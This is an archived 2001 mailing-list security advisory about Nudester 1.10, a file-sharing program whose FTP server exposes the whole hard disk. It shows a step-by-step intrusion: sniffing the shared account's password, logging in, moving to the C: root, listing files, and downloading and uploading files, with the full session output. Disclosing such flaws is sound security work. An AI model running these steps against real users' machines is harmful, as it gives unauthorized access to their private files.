[Real Security] Advisory for Nudester 1.10

From: Gary (Cyph3rat_private)
Date: Thu Aug 16 2001 - 23:34:40 PDT

  • Next message: buggzy: "Re: Relaying in MDAEMON." 

    <------------------------->
[Real Security Advisory #1]
[     Author: Cyph3r           ]
[  www.Real-Security.org  ]
[    Date: 08/16/2001         ]
<------------------------->
[Vulnerable:                       ]
[Nudester 1.10(& below?)]
[  OS: Win9x/me/2k/nt/xp  ]
[ Site: www.nudester.org   ]
<------------------------->

-> Severity: Malicious users can gain full access to the users Files
(upload/download)

-> Overview: Nudester, a file sharing program for porn uses the FTP protocol
to transfer files,
The problem is it gives access to the whole hard disk instead of just the
folder containing porn.
Example:
Open Nudester, and a sniffer program IE: Iris(www.eeye.com) and download a
file from a user on Nudester
While having the sniffer running filtering port 21 inclusive so you can get
the password.

<Sniffed Data>

220 ICS FTP Server ready
user NUDESTER
331 Password required for NUDESTER
pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in

</Sniffed data>

Open an ftp client and connect to the ip

ftp> open ***.***.***.***
Connected to ***.***.***.***
220 ICS FTP Server ready.
User (***.***.***.***:(none)): NUDESTER
331 Password required for NUDESTER.
Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in.

- Bingo!

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
C:\TEMP\*.* not found
226 File sent ok
ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
ftp> cd ..
250 CWD command successful. "C:/" is current directory.
ftp> DIR
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw-   1 ftp      ftp         1152 Oct 30  2000 FRUNLOG.TXT
-rwxrwxrwx   1 ftp      ftp        25473 May 15  1998 MSCDEX.EXE
-rw-rw-rw-   1 ftp      ftp        10604 May 15  1997 CDROM.SYS
-rwxrwxrwx   1 ftp      ftp        20135 May 15  1998 KEYB.COM
-rw-rw-rw-   1 ftp      ftp        34566 May 15  1998 KEYBOARD.SYS
-rwxrwxrwx   1 ftp      ftp        71102 May 15  1998 EDIT.COM
-rw-rw-rw-   1 ftp      ftp           38 Oct 16  1998 AUTOEXEC.OLD
-rw-rw-rw-   1 ftp      ftp           31 Oct 16  1998 CONFIG.OLD
drw-rw-rw-   1 ftp      ftp            0 Oct 30  2030 ATI
-rw-rw-rw-   1 ftp      ftp          121 Oct 29  2000 CONFIG.DOS
-rw-rw-rw-   1 ftp      ftp          113 Oct 29  2000 AUTOEXEC.DOS
-rw-rw-rw-   1 ftp      ftp          436 Nov 18  2000 AUTOEXEC.BAK
drw-rw-rw-   1 ftp      ftp            0 Oct 29  2000 WINDOWS
drw-rw-rw-   1 ftp      ftp            0 Oct 30  2000 WINDOWS.000
-rw-rw-rw-   1 ftp      ftp         7471 Nov 18  2000 NETLOG.TXT
-rw-rw-rw-   1 ftp      ftp          172 Nov 15  2000 CONFIG.BAK
-rw-rw-rw-   1 ftp      ftp         5048 Nov 17  2000 SETUPXLG.TXT
-rwxrwxrwx   1 ftp      ftp          438 Aug 16 00:43 AUTOEXEC.BAT
dr--r--r--   1 ftp      ftp            0 Oct 29  2000 Program Files
-rw-rw-rw-   1 ftp      ftp          172 Nov 18  2000 CONFIG.SYS
-rw-rw-rw-   1 ftp      ftp        19622 Aug 10 18:50 SCANDISK.LOG
-rw-rw-rw-   1 ftp      ftp          327 Oct 30  2030 outreg.txt
-rw-rw-rw-   1 ftp      ftp          339 Oct 30  2030 outreg.ini
drw-rw-rw-   1 ftp      ftp            0 Oct 30  2030 dcpt
-rwxrwxrwx   1 ftp      ftp        17129 Oct 30  2030 BOOTDISK.EXE
-rwxrwxrwx   1 ftp      ftp      2884286 Oct 30  2030 DECOMP.EXE
-rwxrwxrwx   1 ftp      ftp       265420 Oct 30  2030 DOS4GW.EXE
-rw-rw-rw-   1 ftp      ftp          507 Oct 30  2030 FILE_ID.DIZ
-rw-rw-rw-   1 ftp      ftp         2086 Oct 30  2030 HELPME.DOC
-rw-rw-rw-   1 ftp      ftp         3639 Oct 30  2030 LICENSE.DOC
-rw-rw-rw-   1 ftp      ftp         1377 Oct 30  2030 ORDER.DOC
drw-rw-rw-   1 ftp      ftp            0 Nov 02  2000 KPCMS
-rw-rw-rw-   1 ftp      ftp          386 Nov 02  2000 AUTOEXEC.001
drw-rw-rw-   1 ftp      ftp            0 Nov 02  2000 psfonts
-rw-rw-rw-   1 ftp      ftp           25 Nov 03  2000 prompt
-rwxrwxrwx   1 ftp      ftp        95874 May 05  1999 COMMAND.COM
drw-rw-rw-   1 ftp      ftp            0 Nov 19  2000 Winzip
drw-rw-rw-   1 ftp      ftp            0 Dec 10  2000 unzipped
drw-rw-rw-   1 ftp      ftp            0 Nov 19  2000 Antivirus
drw-rw-rw-   1 ftp      ftp            0 Dec 16  2000 My Music
-rw-rw-rw-   1 ftp      ftp          118 Jan 20 00:27 netsig.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 15 21:05 accelerator
-rw-rw-rw-   1 ftp      ftp        22721 Aug 17 01:00 winzip.log
226 File sent ok
ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.

- Lets see if we have access to download a file

ftp> get netsig.txt
200 Port command successful.
150 Opening data connection for netsig.txt.
226 File sent ok
ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.

- Yep, let's try to upload a file

ftp> put c:\temp.txt
200 Port command successful.
150 Opening data connection for TEMP.TXT.
226 File received ok

-> Conclusion: anyone can gain full access to Nudester user's files; the
username is the same for every user
However the password is not the same, you will have to sniff while
downloading a file to retrieve the password,
The only solution to this problem is not to use Nudester.

-> Credits: Cyph3r - Cyph3rat_private

-> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid,
spasms, trew, zeronine, matt, shizniz, z0mb1e
b0b, neonfreon, dragnet, c0de, spiked and anyone else i missed.

    This archive was generated by hypermail 2b30 : Fri Aug 17 2001 - 07:42:22 PDT